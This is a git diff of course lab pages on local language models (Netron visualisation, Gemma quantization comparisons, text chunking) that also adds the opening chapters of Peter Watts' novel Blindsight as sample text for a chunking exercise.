diff --git a/content/labs/lab-1-visualization-in-transformerlab.md b/content/labs/lab-1-visualization-in-transformerlab.md
index 1f31cbd..4665ff8 100644
--- a/content/labs/lab-1-visualization-in-transformerlab.md
+++ b/content/labs/lab-1-visualization-in-transformerlab.md
@@ -86,14 +86,13 @@ Use the launch panel below to open the local Netron service on port `8338`.
-### Execute: Download the Two GGUF Files
+### Execute: Download the GGUF File
-You will work with two small GGUF models in this objective:
+You will work with a small GGUF model in this objective. Download the provided file:
-- [Qwen 3 0.6B](/api/lab1/models/qwen3-0.6b-q8_0.gguf)
-- [Llama 3.2 1B](/api/lab1/models/llama-3.2-1b-q4_k_m.gguf)
+- [Llama-3.2-1B.Q4_K_M.gguf](/api/lab1/models/llama-3.2-1b-q4_k_m.gguf) for Llama 3.2 1B
-These files are intentionally small enough to make architecture exploration practical in a classroom lab. Download both files to a convenient location such as your `Downloads` folder. Once you've downloaded your files, you can open them using the "Open Model" Button on the Netron Homepage.
+This file is intentionally small enough to make architecture exploration practical in a classroom lab. Save it to a convenient location such as your `Downloads` folder. Once you've downloaded the file, you can open it using the "Open Model" button on the Netron home page.
@@ -105,7 +104,7 @@ These files are intentionally small enough to make architecture exploration prac
Once Netron is open:
1. Select **Open Model** or drag a GGUF file directly into the browser window.
-2. Start with `Qwen 3 0.6B`.
+2. Open `Llama 3.2 1B`.
Netron will display the model as a graph of tensors, operators, and named blocks. This is a more literal view than the simplified lecture diagrams, but it is still showing the same fundamental idea: the model is a large stack of numeric values, each serving a different purpose to model language.
@@ -132,26 +131,26 @@ As you move around the graph, focus on these three recurring structures. Each o
-Notably, Qwen 3 0.6B is composed of 28 of these blocks! This is signifigantly more than GPT-2 (12 blocks), despite this model being 1/3rd the size!
+Notably, even small local models are composed of many repeated blocks. The exact count varies by model family, size, and export format, but the important pattern is the repeated attention and feed-forward structure.
Lastly, you may see labels such as **MatMul**, **Mul**, or **mulmat**, depending on how the graph was exported and named. In practice, these are often part of the feed-forward path that expands and reshapes the model's internal representation before passing it onward.
-**Compare the Two Small Models**
+**Inspect the Small Model**
-Both models are small compared to modern production systems, but they are still large enough to reveal repeating architectural patterns.
+This model is small compared to modern production systems, but it is still large enough to reveal repeating architectural patterns.
-As you compare them, ask:
+As you inspect it, ask:
- Where do the repeating blocks begin to stand out?
-- Which names remain stable between the two models?
-- How many *Attention Heads* does each model have? How might this affect transformations predicted by the model?
+- Which names remain stable across repeated blocks?
+- How many *Attention Heads* does the model have? How might this affect transformations predicted by the model?
-
-
- 
-
- Netron Qwen 3 0.6B Layers 1 & 2
-
+
+
+
+
+Netron Qwen 3 0.6B Layers 1 & 2
+
---
@@ -160,7 +159,7 @@ As you compare them, ask:
### Execute: Run the Local Confidence Widget
-The widget below talks to the preloaded local Lab 1 model through Ollama. Enter any prompt you like, generate a response, and then hover over the output tokens.
+The widget below talks to the preloaded Gemma 4 E2B Q4 model through Ollama. Enter any prompt you like, generate a response, and then hover over the output tokens.
diff --git a/content/labs/lab-2-quantization-tradeoffs.md b/content/labs/lab-2-quantization-tradeoffs.md
index 9704280..911211b 100644
--- a/content/labs/lab-2-quantization-tradeoffs.md
+++ b/content/labs/lab-2-quantization-tradeoffs.md
@@ -1,7 +1,7 @@
---
order: 2
-title: "Lab 2 - Quantization Tradeoffs: Comparing 2-bit, 4-bit, and 8-bit"
-description: Compare Gemma 4 E2B in three Ollama quantizations and study how lower precision changes behavior.
+title: "Lab 2 - Quantization Tradeoffs: Comparing 4-bit and 6-bit"
+description: Compare Gemma 4 E2B in two Ollama quantizations and study how lower precision changes behavior.
---
@@ -10,7 +10,7 @@ description: Compare Gemma 4 E2B in three Ollama quantizations and study how low
In this lab, we will:
-- Pull the same Gemma model in Q2, Q4, and Q8 Ollama variants
+- Pull the same Gemma model in Q4 and Q6 Ollama variants
- Compare the quantization labels and model behavior across those variants
- Observe how lower precision changes the model's behavior
- Build intuition for when a smaller quant may or may not be worth it
@@ -23,13 +23,12 @@ In this lab, we will:
## Objective 1: Understand the Model and the Quantizations
-For this lab, we will use three Ollama-published variants of **Gemma 4 E2B** that represent distinct precision bands:
+For this lab, we will use two Ollama-published variants of **Gemma 4 E2B** that represent distinct precision bands:
-| Precision band | Ollama model tag | Why we are using it |
-| -------------- | ----------------------------------- | --------------------------------------- |
-| Q2 | `cajina/gemma4_e2b-q2_k_xl:v01` | Most aggressive compression in this lab |
-| Q4 | `batiai/gemma4-e2b:q4` | Common middle-ground quant |
-| Q8 | `bjoernb/gemma4-e2b-fast:latest` | Highest-quality quant in this lab |
+| Precision band | Ollama model tag | Why we are using it |
+| -------------- | ---------------------- | --------------------------------- |
+| Q4 | `batiai/gemma4-e2b:q4` | Faster, smaller quant |
+| Q6 | `batiai/gemma4-e2b:q6` | Higher-quality quant in this lab |
Even though the Ollama tags differ, these are all variants of the same underlying Gemma 4 E2B model family. The main variable we are changing is how the weights are stored.
@@ -83,7 +82,7 @@ Those are not identical to the original weight, but they may still be close enou
### Explore: Interactive precision viewer
-The viewer below zooms out from one weight and instead shows a toy layer with 16 stored values. Real GGUF schemes such as `Q4_K_M` and `UD-IQ2_M` are more sophisticated than this toy example, but the core idea is the same:
+The viewer below zooms out from one weight and instead shows a toy layer with 16 stored values. Real GGUF schemes such as `Q4_K_M` and `Q6_K` are more sophisticated than this toy example, but the core idea is the same:
- Fewer bits means fewer representable values
- More weights get pushed into the same small set of stored buckets
@@ -93,11 +92,11 @@ The viewer below zooms out from one weight and instead shows a toy layer with 16
### Explore: Compare the same prompts through the hosted chat widget
-By default, the widget below points to the courseware-managed Ollama service and the three Lab 2 model tags above. You can still switch to another endpoint if your instructor provides one.
+By default, the widget below points to the courseware-managed Ollama service and the Lab 2 model tags above. You can still switch to another endpoint if your instructor provides one.
- Use the preloaded managed endpoint or replace it with another compatible endpoint
- Optionally add an API key if your chosen endpoint requires one
-- Switch between the configured Q2, Q4, and Q8 Gemma variants
+- Switch between the configured Q4 and Q6 Gemma variants
- Re-run the same prompt so you can compare coherence, stability, and SVG output
- Try a visual prompt such as `Draw a pelican riding a bicycle.`
@@ -109,7 +108,7 @@ The widget keeps the transcript in your browser so you can switch models without
By this point, you should have:
-- Compared three quantized versions of the same model
+- Compared two quantized versions of the same model
- Measured the storage savings directly
- Verified that the core model metadata remains largely the same
- Observed where output quality begins to degrade
@@ -118,4 +117,4 @@ The important takeaway is not that one quant is always "best." The important tak
## Conclusion
-This lab isolates quantization as the main variable. By comparing **Gemma 4 E2B** in Q2, Q4, and Q8 Ollama variants, you can directly observe one of the most important tradeoffs in local inference: balancing model quality against efficiency and resource constraints.
+This lab isolates quantization as the main variable. By comparing **Gemma 4 E2B** in Q4 and Q6 Ollama variants, you can directly observe one of the most important tradeoffs in local inference: balancing model quality against efficiency and resource constraints.
diff --git a/content/labs/lab-6-embedding-and-chunking.md b/content/labs/lab-6-embedding-and-chunking.md
index 2a6bd33..b02e122 100644
--- a/content/labs/lab-6-embedding-and-chunking.md
+++ b/content/labs/lab-6-embedding-and-chunking.md
@@ -91,7 +91,7 @@ Select each option and observe the different ways ChunkViz breaks text into chun
Each strategy comes with its own benefits and drawbacks. Character-based splitting is often one of the easiest strategies to implement because OCR and text extraction ultimately produce characters. Token-based splitting is useful when keeping chunk sizes consistent for a specific model matters most. Sentence and recursive strategies are often better at preserving complete thoughts, although real-world documents do not always follow clean sentence boundaries.
-Explore one more chunking example using a larger document. Open your provided copy of _Blindsight_ by Peter Watts in `.txt` format, paste its contents into ChunkViz, and then continue experimenting with chunk sizes from `64` up to `1024` using different strategies. Notice how different chunk sizes and separators change the resulting structure.
+Explore one more chunking example using a larger document. Open the provided file: [Blindsight.md](/labs/lab-6-embedding-and-chunking/Blindsight.md). Copy the novel text, paste it into ChunkViz, and then continue experimenting with chunk sizes from `64` up to `1024` using different strategies. Notice how different chunk sizes and separators change the resulting structure, especially around paragraph breaks, scene breaks, and chapter headings.
diff --git a/content/labs/lab-6-embedding-and-chunking_files/Blindsight.md b/content/labs/lab-6-embedding-and-chunking_files/Blindsight.md
new file mode 100644
index 0000000..febfa05
--- /dev/null
+++ b/content/labs/lab-6-embedding-and-chunking_files/Blindsight.md
@@ -0,0 +1,4357 @@
+Blindsight
+Peter Watts
+
+
+
+For Lisa
+
+If we're not in pain, we're not alive.
+
+
+
+Prologue
+Theseus
+Rorschach
+Charybdis
+Acknowledgments
+Notes and References
+Creative Commons Licensing Information
+
+
+
+
+
+"This is what fascinates me most in existence: the peculiar necessity of imagining what is, in fact, real."
+—Philip Gourevitch
+
+
+"You will die like a dog for no good reason."
+—Ernest Hemingway
+
+
+
+Prologue
+
+"Try to touch the past. Try to deal with the past. It's not real. It's just a dream."
+—Ted Bundy
+
+It didn't start out here. Not with the scramblers or Rorschach, not with Big Ben or Theseus or the vampires. Most people would say it started with the Fireflies, but they'd be wrong. It ended with all those things.
+For me, it began with Robert Paglino.
+At the age of eight, he was my best and only friend. We were fellow outcasts, bound by complementary misfortune. Mine was developmental. His was genetic: an uncontrolled genotype that left him predisposed to nearsightedness, acne, and (as it later turned out) a susceptibility to narcotics. His parents had never had him optimized. Those few TwenCen relics who still believed in God also held that one shouldn't try to improve upon His handiwork. So although both of us could have been repaired, only one of us had been.
+I arrived at the playground to find Pag the center of attention for some half-dozen kids, those lucky few in front punching him in the head, the others making do with taunts of mongrel and polly while waiting their turn. I watched him raise his arms, almost hesitantly, to ward off the worst of the blows. I could see into his head better than I could see into my own; he was scared that his attackers might think those hands were coming up to hit back, that they'd read it as an act of defiance and hurt him even more. Even then, at the tender age of eight and with half my mind gone, I was becoming a superlative observer.
+But I didn't know what to do.
+I hadn't seen much of Pag lately. I was pretty sure he'd been avoiding me. Still, when your best friend's in trouble you help out, right? Even if the odds are impossible—and how many eight-year-olds would go up against six bigger kids for a sandbox buddy?—at least you call for backup. Flag a sentry. Something.
+I just stood there. I didn't even especially want to help him.
+That didn't make sense. Even if he hadn't been my best friend, I should at least have empathized. I'd suffered less than Pag in the way of overt violence; my seizures tended to keep the other kids at a distance, scared them even as they incapacitated me. Still. I was no stranger to the taunts and insults, or the foot that appears from nowhere to trip you up en route from A to B. I knew how that felt.
+Or I had, once.
+But that part of me had been cut out along with the bad wiring. I was still working up the algorithms to get it back, still learning by observation. Pack animals always tear apart the weaklings in their midst. Every child knows that much instinctively. Maybe I should just let that process unfold, maybe I shouldn't try to mess with nature. Then again, Pag's parents hadn't messed with nature, and look what it got them: a son curled up in the dirt while a bunch of engineered superboys kicked in his ribs.
+In the end, propaganda worked where empathy failed. Back then I didn't so much think as observe, didn't deduce so much as remember—and what I remembered was a thousand inspirational stories lauding anyone who ever stuck up for the underdog.
+So I picked up a rock the size of my fist and hit two of Pag's assailants across the backs of their heads before anyone even knew I was in the game.
+A third, turning to face the new threat, took a blow to the face that audibly crunched the bones of his cheek. I remember wondering why I didn't take any satisfaction from that sound, why it meant nothing beyond the fact I had one less opponent to worry about.
+The rest of them ran at the sight of blood. One of the braver promised me I was dead, shouted "Fucking zombie!" over his shoulder as he disappeared around the corner.
+Three decades it took, to see the irony in that remark.
+Two of the enemy twitched at my feet. I kicked one in the head until it stopped moving, turned to the other. Something grabbed my arm and I swung without thinking, without looking until Pag yelped and ducked out of reach.
+"Oh," I said. "Sorry."
+One thing lay motionless. The other moaned and held its head and curled up in a ball.
+"Oh shit," Pag panted. Blood coursed unheeded from his nose and splattered down his shirt. His cheek was turning blue and yellow. "Oh shit oh shit oh shit..."
+I thought of something to say. "You all right?"
+"Oh shit, you—I mean, you never..." He wiped his mouth. Blood smeared the back of his hand. "Oh man are we in trouble."
+"They started it."
+"Yeah, but you—I mean, look at them!"
+The moaning thing was crawling away on all fours. I wondered how long it would be before it found reinforcements. I wondered if I should kill it before then.
+"You'da never done that before," Pag said.
+Before the operation, he meant.
+I actually did feel something then—faint, distant, but unmistakable. I felt angry. "They started—"
+Pag backed away, eyes wide. "What are you doing? Put that down!"
+I'd raised my fists. I didn't remember doing that. I unclenched them. It took a while. I had to look at my hands very hard for a long, long time.
+The rock dropped to the ground, blood-slick and glistening.
+"I was trying to help." I didn't understand why he couldn't see that.
+"You're, you're not the same," Pag said from a safe distance. "You're not even Siri any more."
+"I am too. Don't be a fuckwad."
+"They cut out your brain!"
+"Only half. For the ep—"
+"I know for the epilepsy! You think I don't know? But you were in that half—or, like, part of you was..." He struggled with the words, with the concept behind them. "And now you're different. It's like, your mom and dad murdered you—"
+"My mom and dad," I said, suddenly quiet, "saved my life. I would have died."
+"I think you did die," said my best and only friend. "I think Siri died, they scooped him out and threw him away and you're some whole other kid that just, just grew back out of what was left. You're not the same. Ever since. You're not the same."
+I still don't know if Pag really knew what he was saying. Maybe his mother had just pulled the plug on whatever game he'd been wired into for the previous eighteen hours, forced him outside for some fresh air. Maybe, after fighting pod people in gamespace, he couldn't help but see them everywhere. Maybe.
+But you could make a case for what he said. I do remember Helen telling me (and telling me) how difficult it was to adjust. Like you had a whole new personality, she said, and why not? There's a reason they call it radical hemispherectomy: half the brain thrown out with yesterday's krill, the remaining half press-ganged into double duty. Think of all the rewiring that one lonely hemisphere must have struggled with as it tried to take up the slack. It turned out okay, obviously. The brain's a very flexible piece of meat; it took some doing, but it adapted. I adapted. Still. Think of all that must have been squeezed out, deformed, reshaped by the time the renovations were through. You could argue that I'm a different person than the one who used to occupy this body.
+The grownups showed up eventually, of course. Medicine was bestowed, ambulances called. Parents were outraged, diplomatic volleys exchanged, but it's tough to drum up neighborhood outrage on behalf of your injured baby when playground surveillance from three angles shows the little darling—and five of his buddies— kicking in the ribs of a disabled boy. My mother, for her part, recycled the usual complaints about problem children and absentee fathers—Dad was off again in some other hemisphere—but the dust settled pretty quickly. Pag and I even stayed friends, after a short hiatus that reminded us both of the limited social prospects open to schoolyard rejects who don't stick together.
+So I survived that and a million other childhood experiences. I grew up and I got along. I learned to fit in. I observed, recorded, derived the algorithms and mimicked appropriate behaviors. Not much of it was—heartfelt, I guess the word is. I had friends and enemies, like everyone else. I chose them by running through checklists of behaviors and circumstances compiled from years of observation.
+I may have grown up distant but I grew up objective, and I have Robert Paglino to thank for that. His seminal observation set everything in motion. It led me into Synthesis, fated me to our disastrous encounter with the Scramblers, spared me the worse fate befalling Earth. Or the better one, I suppose, depending on your point of view. Point of view matters: I see that now, blind, talking to myself, trapped in a coffin falling past the edge of the solar system. I see it for the first time since some beaten bloody friend on a childhood battlefield convinced me to throw my own point of view away.
+He may have been wrong. I may have been. But that, that distance—that chronic sense of being an alien among your own kind—it's not entirely a bad thing.
+It came in especially handy when the real aliens came calling.
+
+
+
+
+
+
+Theseus
+
+
+
+"Blood makes noise." —Susanne Vega
+
+Imagine you are Siri Keeton:
+You wake in an agony of resurrection, gasping after a record-shattering bout of sleep apnea spanning one hundred forty days. You can feel your blood, syrupy with dobutamine and leuenkephalin, forcing its way through arteries shriveled by months on standby. The body inflates in painful increments: blood vessels dilate; flesh peels apart from flesh; ribs crack in your ears with sudden unaccustomed flexion. Your joints have seized up through disuse. You're a stick-man, frozen in some perverse rigor vitae.
+You'd scream if you had the breath.
+Vampires did this all the time, you remember. It was normal for them, it was their own unique take on resource conservation. They could have taught your kind a few things about restraint, if that absurd aversion to right-angles hadn't done them in at the dawn of civilization. Maybe they still can. They're back now, after all— raised from the grave with the voodoo of paleogenetics, stitched together from junk genes and fossil marrow steeped in the blood of sociopaths and high-functioning autistics. One of them commands this very mission. A handful of his genes live on in your own body so it too can rise from the dead, here at the edge of interstellar space. Nobody gets past Jupiter without becoming part vampire.
+The pain begins, just slightly, to recede. You fire up your inlays and access your own vitals: it'll be long minutes before your body responds fully to motor commands, hours before it stops hurting. The pain's an unavoidable side effect. That's just what happens when you splice vampire subroutines into Human code. You asked about painkillers once, but nerve blocks of any kind compromise metabolic reactivation. Suck it up, soldier.
+You wonder if this was how it felt for Chelsea, before the end. But that evokes a whole other kind of pain, so you block it out and concentrate on the life pushing its way back into your extremities. Suffering in silence, you check the logs for fresh telemetry.
+You think: That can't be right.
+Because if it is, you're in the wrong part of the universe. You're not in the Kuiper Belt where you belong: you're high above the ecliptic and deep into the Oort, the realm of long-period comets that only grace the sun every million years or so. You've gone interstellar, which means (you bring up the system clock) you've been undead for eighteen hundred days.
+You've overslept by almost five years.
+The lid of your coffin slides away. Your own cadaverous body reflects from the mirrored bulkhead opposite, a desiccated lungfish waiting for the rains. Bladders of isotonic saline cling to its limbs like engorged antiparasites, like the opposite of leeches. You remember the needles going in just before you shut down, way back when your veins were more than dry twisted filaments of beef jerky.
+Szpindel's reflection stares back from his own pod to your immediate right. His face is as bloodless and skeletal as yours. His wide sunken eyes jiggle in their sockets as he reacquires his own links, sensory interfaces so massive that your own off-the-shelf inlays amount to shadow-puppetry in comparison.
+You hear coughing and the rustling of limbs just past line-of-sight, catch glimpses of reflected motion where the others stir at the edge of vision.
+"Wha—" Your voice is barely more than a hoarse whisper. "…happ…?"
+Szpindel works his jaw. Bone cracks audibly.
+"…Sssuckered," he hisses.
+You haven't even met the aliens yet, and already they're running rings around you.
+
+*
+
+So we dragged ourselves back from the dead: five part-time cadavers, naked, emaciated, barely able to move even in zero gee. We emerged from our coffins like premature moths ripped from their cocoons, still half-grub. We were alone and off course and utterly helpless, and it took a conscious effort to remember: they would never have risked our lives if we hadn't been essential.
+"Morning, commissar." Isaac Szpindel reached one trembling, insensate hand for the feedback gloves at the base of his pod. Just past him, Susan James was curled into a loose fetal ball, murmuring to herselves. Only Amanda Bates, already dressed and cycling through a sequence of bone-cracking isometrics, possessed anything approaching mobility. Every now and then she tried bouncing a rubber ball off the bulkhead; but not even she was up to catching it on the rebound yet.
+The journey had melted us down to a common archetype. James' round cheeks and hips, Szpindel's high forehead and lumpy, lanky chassis—even the enhanced carboplatinum brick shit-house that Bates used for a body— all had shriveled to the same desiccated collection of sticks and bones. Even our hair seemed to have become strangely discolored during the voyage, although I knew that was impossible. More likely it was just filtering the pallor of the skin beneath. Still. The pre-dead James had been dirty blond, Szpindel's hair had been almost dark enough to call black— but the stuff floating from their scalps looked the same dull kelpy brown to me now. Bates kept her head shaved, but even her eyebrows weren't as rusty as I remembered them.
+We'd revert to our old selves soon enough. Just add water. For now, though, the old slur was freshly relevant: the Undead really did all look the same, if you didn't know how to look.
+If you did, of course—if you forgot appearance and watched for motion, ignored meat and studied topology—you'd never mistake one for another. Every facial tic was a data point, every conversational pause spoke volumes more than the words to either side. I could see James' personae shatter and coalesce in the flutter of an eyelash. Szpindel's unspoken distrust of Amanda Bates shouted from the corner of his smile. Every twitch of the phenotype cried aloud to anyone who knew the language.
+"Where's—" James croaked, coughed, waved one spindly arm at Sarasti's empty coffin gaping at the end of the row.
+Szpindel's lips cracked in a small rictus. "Gone back to Fab, eh? Getting the ship to build some dirt to lie on."
+"Probably communing with the Captain." Bates breathed louder than she spoke, a dry rustle from pipes still getting reacquainted with the idea of respiration.
+James again: "Could do that up here."
+"Could take a dump up here, too," Szpindel rasped. "Some things you do by yourself, eh?"
+And some things you kept to yourself. Not many baselines felt comfortable locking stares with a vampire—Sarasti, ever courteous, tended to avoid eye contact for exactly that reason—but there were other surfaces to his topology, just as mammalian and just as readable. If he had withdrawn from public view, maybe I was the reason. Maybe he was keeping secrets.
+After all, Theseus damn well was.
+
+*
+
+She'd taken us a good fifteen AUs towards our destination before something scared her off course. Then she'd skidded north like a startled cat and started climbing: a wild high three-gee burn off the ecliptic, thirteen hundred tonnes of momentum bucking against Newton's First. She'd emptied her Penn tanks, bled dry her substrate mass, squandered a hundred forty days' of fuel in hours. Then a long cold coast through the abyss, years of stingy accounting, the thrust of every antiproton weighed against the drag of sieving it from the void. Teleportation isn't magic: the Icarus stream couldn't send us the actual antimatter it made, only the quantum specs. Theseus had to filterfeed the raw material from space, one ion at a time. For long dark years she'd made do on pure inertia, hoarding every swallowed atom. Then a flip; ionizing lasers strafing the space ahead; a ramscoop thrown wide in a hard brake. The weight of a trillion trillion protons slowed her down and refilled her gut and flattened us all over again. Theseus had burned relentless until almost the moment of our resurrection.
+It was easy enough to retrace those steps; our course was there in ConSensus for anyone to see. Exactly why the ship had blazed that trail was another matter. Doubtless it would all come out during the post-rez briefing. We were hardly the first vessel to travel under the cloak of sealed orders, and if there'd been a pressing need to know by now we'd have known by now. Still, I wondered who had locked out the Comm logs. Mission Control, maybe. Or Sarasti. Or Theseus herself, for that matter. It was easy to forget the Quantical AI at the heart of our ship. It stayed so discreetly in the background, nurtured and carried us and permeated our existence like an unobtrusive God; but like God, it never took your calls.
+Sarasti was the official intermediary. When the ship did speak, it spoke to him— and Sarasti called it Captain.
+So did we all.
+
+*
+
+He'd given us four hours to come back. It took more than three just to get me out of the crypt. By then my brain was at least firing on most of its synapses, although my body—still sucking fluids like a thirsty sponge— continued to ache with every movement. I swapped out drained electrolyte bags for fresh ones and headed aft.
+Fifteen minutes to spin-up. Fifty to the post-resurrection briefing. Just enough time for those who preferred gravity-bound sleep to haul their personal effects into the drum and stake out their allotted 4.4 square meters of floor space.
+Gravity—or any centripetal facsimile thereof—did not appeal to me. I set up my own tent in zero-gee and as far to stern as possible, nuzzling the forward wall of the starboard shuttle tube. The tent inflated like an abscess on Theseus' spine, a little climate-controlled bubble of atmosphere in the dark cavernous vacuum beneath the ship's carapace. My own effects were minimal; it took all of thirty seconds to stick them to the wall, and another thirty to program the tent's environment.
+Afterwards I went for a hike. After five years, I needed the exercise.
+Stern was closest, so I started there: at the shielding that separated payload from propulsion. A single sealed hatch blistered the aft bulkhead dead center. Behind it, a service tunnel wormed back through machinery best left untouched by human hands. The fat superconducting torus of the ramscoop ring; the antennae fan behind it, unwound now into an indestructible soap-bubble big enough to shroud a city, its face turned sunward to catch the faint quantum sparkle of the Icarus antimatter stream. More shielding behind that; then the telematter reactor, where raw hydrogen and refined information conjured fire three hundred times hotter than the sun's. I knew the incantations, of course—antimatter cracking and deconstruction, the teleportation of quantum serial numbers—but it was still magic to me, how we'd come so far so fast. It would have been magic to anyone.
+Except Sarasti, maybe.
+Around me, the same magic worked at cooler temperatures and to less volatile ends: a small riot of chutes and dispensers crowded the bulkhead on all sides. A few of those openings would choke on my fist: one or two could swallow me whole. Theseus' fabrication plant could build everything from cutlery to cockpits. Give it a big enough matter stockpile and it could have even been built another Theseus, albeit in many small pieces and over a very long time. Some wondered if it could build another crew as well, although we'd all been assured that was impossible. Not even these machines had fine enough fingers to reconstruct a few trillion synapses in the space of a human skull. Not yet, anyway.
+I believed it. They would never have shipped us out fully-assembled if there'd been a cheaper alternative.
+I faced forward. Putting the back of my head against that sealed hatch I could see almost to Theseus' bow, an uninterrupted line-of-sight extending to a tiny dark bull's-eye thirty meters ahead. It was like staring at a great textured target in shades of white and gray: concentric circles, hatches centered within bulkheads one behind another, perfectly aligned. Every one stood open, in nonchalant defiance of a previous generation's safety codes. We could keep them closed if we wanted to, if it made us feel safer. That was all it would do, though; it wouldn't improve our empirical odds one whit. In the event of trouble those hatches would slam shut long milliseconds before Human senses could even make sense of an alarm. They weren't even computer-controlled. Theseus' body parts had reflexes.
+I pushed off against the stern plating—wincing at the tug and stretch of disused tendons—and coasted forward, leaving Fab behind. The shuttle-access hatches to Scylla and Charybdis briefly constricted my passage to either side. Past them the spine widened into a corrugated extensible cylinder two meters across and—at the moment—maybe fifteen long. A pair of ladders ran opposite each other along its length; raised portholes the size of manhole covers stippled the bulkhead to either side. Most of those just looked into the hold. A couple served as general-purpose airlocks, should anyone want to take a stroll beneath the carapace. One opened into my tent. Another, four meters further forward, opened into Bates'.
+From a third, just short of the forward bulkhead, Jukka Sarasti climbed into view like a long white spider.
+If he'd been Human I'd have known instantly what I saw there, I'd have smelled murderer all over his topology. And I wouldn't have been able to even guess at the number of his victims, because his affect was so utterly without remorse. The killing of a hundred would leave no more stain on Sarasti's surfaces than the swatting of an insect; guilt beaded and rolled off this creature like water on wax.
+But Sarasti wasn't human. Sarasti was a whole different animal, and coming from him all those homicidal refractions meant nothing more than predator. He had the inclination, was born to it; whether he had ever acted on it was between him and Mission Control.
+Maybe they cut you some slack, I didn't say to him. Maybe it's just a cost of doing business. You're mission-critical, after all. For all I know you cut a deal. You're so very smart, you know we wouldn't have brought you back in the first place if we hadn't needed you. From the day they cracked the vat you knew you had leverage.
+Is that how it works, Jukka? You save the world, and the folks who hold your leash agree to look the other way?
+As a child I'd read tales about jungle predators transfixing their prey with a stare. Only after I'd met Jukka Sarasti did I know how it felt. But he wasn't looking at me now. He was focused on installing his own tent, and even if he had looked me in the eye there'd have been nothing to see but the dark wraparound visor he wore in deference to Human skittishness. He ignored me as I grabbed a nearby rung and squeezed past.
+I could have sworn I smelled raw meat on his breath.
+Into the drum (drums, technically; the BioMed hoop at the back spun on its own bearings). I flew through the center of a cylinder sixteen meters across. Theseus' spinal nerves ran along its axis, the exposed plexii and piping bundled against the ladders on either side. Past them, Szpindel's and James' freshly-erected tents rose from nooks on opposite sides of the world. Szpindel himself floated off my shoulder, still naked but for his gloves, and I could tell from the way his fingers moved that his favorite color was green. He anchored himself to one of three stairways to nowhere arrayed around the drum: steep narrow steps rising five vertical meters from the deck into empty air.
+The next hatch gaped dead-center of the drum's forward wall; pipes and conduits plunged into the bulkhead to each side. I grabbed a convenient rung to slow myself—biting down once more on the pain—and floated through.
+T-junction. The spinal corridor continued forward, a smaller diverticulum branched off to an EVA cubby and the forward airlock. I stayed the course and found myself back in the crypt, mirror-bright and less than two meters deep. Empty pods gaped to the left; sealed ones huddled to the right. We were so irreplaceable we'd come with replacements. They slept on, oblivious. I'd met three of them back in training. Hopefully none of us would be getting reacquainted any time soon.
+Only four pods to starboard, though. No backup for Sarasti.
+Another hatchway. Smaller this time. I squeezed through into the bridge. Dim light there, a silent shifting mosaic of icons and alphanumerics iterating across dark glassy surfaces. Not so much bridge as cockpit, and a cramped one at that. I'd emerged between two acceleration couches, each surrounded by a horseshoe array of controls and readouts. Nobody expected to ever use this compartment. Theseus was perfectly capable of running herself, and if she wasn't we were capable of running her from our inlays, and if we weren't the odds were overwhelming that we were all dead anyway. Still, against that astronomically off-the-wall chance, this was where one or two intrepid survivors could pilot the ship home again after everything else had failed.
+Between the footwells the engineers had crammed one last hatch and one last passageway: to the observation blister on Theseus' prow. I hunched my shoulders (tendons cracked and complained) and pushed through—
+—into darkness. Clamshell shielding covered the outside of the dome like a pair of eyelids squeezed tight. A single icon glowed softly from a touchpad to my left; faint stray light followed me through from the spine, brushed dim fingers across the concave enclosure. The dome resolved in faint shades of blue and gray as my eyes adjusted. A stale draft stirred the webbing floating from the rear bulkhead, mixed oil and machinery at the back of my throat. Buckles clicked faintly in the breeze like impoverished wind chimes.
+I reached out and touched the crystal: the innermost layer of two, warm air piped through the gap between to cut the cold. Not completely, though. My fingertips chilled instantly.
+Space out there.
+Perhaps, en route to our original destination, Theseus had seen something that scared her clear out of the solar system. More likely she hadn't been running away from anything but to something else, something that hadn't been discovered until we'd already died and gone from Heaven. In which case...
+I reached back and tapped the touchpad. I half-expected nothing to happen; Theseus' windows could be as easily locked as her comm logs. But the dome split instantly before me, a crack then a crescent then a wide-eyed lidless stare as the shielding slid smoothly back into the hull. My fingers clenched reflexively into a fistful of webbing. The sudden void stretched empty and unforgiving in all directions, and there was nothing to cling to but a metal disk barely four meters across.
+Stars, everywhere. So many stars that I could not for the life me understand how the sky could contain them all yet be so black. Stars, and—
+—nothing else.
+What did you expect? I chided myself. An alien mothership hanging off the starboard bow?
+Well, why not? We were out here for something.
+The others were, anyway. They'd be essential no matter where we'd ended up. But my own situation was a bit different, I realized. My usefulness degraded with distance.
+And we were over half a light year from home.
+"When it is dark enough, you can see the stars."
+—Emerson
+
+Where was I when the lights came down?
+I was emerging from the gates of Heaven, mourning a father who was—to his own mind, at least—still alive.
+It had been scarcely two months since Helen had disappeared under the cowl. Two months by our reckoning, at least. From her perspective it could have been a day or a decade; the Virtually Omnipotent set their subjective clocks along with everything else.
+She wasn't coming back. She would only deign to see her husband under conditions that amounted to a slap in the face. He didn't complain. He visited as often as she would allow: twice a week, then once. Then every two. Their marriage decayed with the exponential determinism of a radioactive isotope and still he sought her out, and accepted her conditions.
+On the day the lights came down, I had joined him at my mother's side. It was a special occasion, the last time we would ever see her in the flesh. For two months her body had lain in state along with five hundred other new ascendants on the ward, open for viewing by the next of kin. The interface was no more real than it would ever be, of course; the body could not talk to us. But at least it was there, its flesh warm, the sheets clean and straight. Helen's lower face was still visible below the cowl, though eyes and ears were helmeted. We could touch her. My father often did. Perhaps some distant part of her still felt it.
+But eventually someone has to close the casket and dispose of the remains. Room must be made for the new arrivals—and so we came to this last day at my mother's side. Jim took her hand one more time. She would still be available in her world, on her terms, but later this day the body would be packed into storage facilities crowded far too efficiently for flesh and blood visitors. We had been assured that the body would remain intact—the muscles electrically exercised, the body flexed and fed, the corpus kept ready to return to active duty should Heaven experience some inconceivable and catastrophic meltdown. Everything was reversible, we were told. And yet—there were so many who had ascended, and not even the deepest catacombs go on forever. There were rumors of dismemberment, of nonessential body parts hewn away over time according to some optimum-packing algorithm. Perhaps Helen would be a torso this time next year, a disembodied head the year after. Perhaps her chassis would be stripped down to the brain before we'd even left the building, awaiting only that final technological breakthrough that would herald the arrival of the Great Digital Upload.
+Rumors, as I say. I personally didn't know of anyone who'd come back after ascending, but then why would anyone want to? Not even Lucifer left Heaven until he was pushed.
+Dad might have known for sure—Dad knew more than most people, about the things most people weren't supposed to know—but he never told tales out of turn. Whatever he knew, he'd obviously decided its disclosure wouldn't have changed Helen's mind. That would have been enough for him.
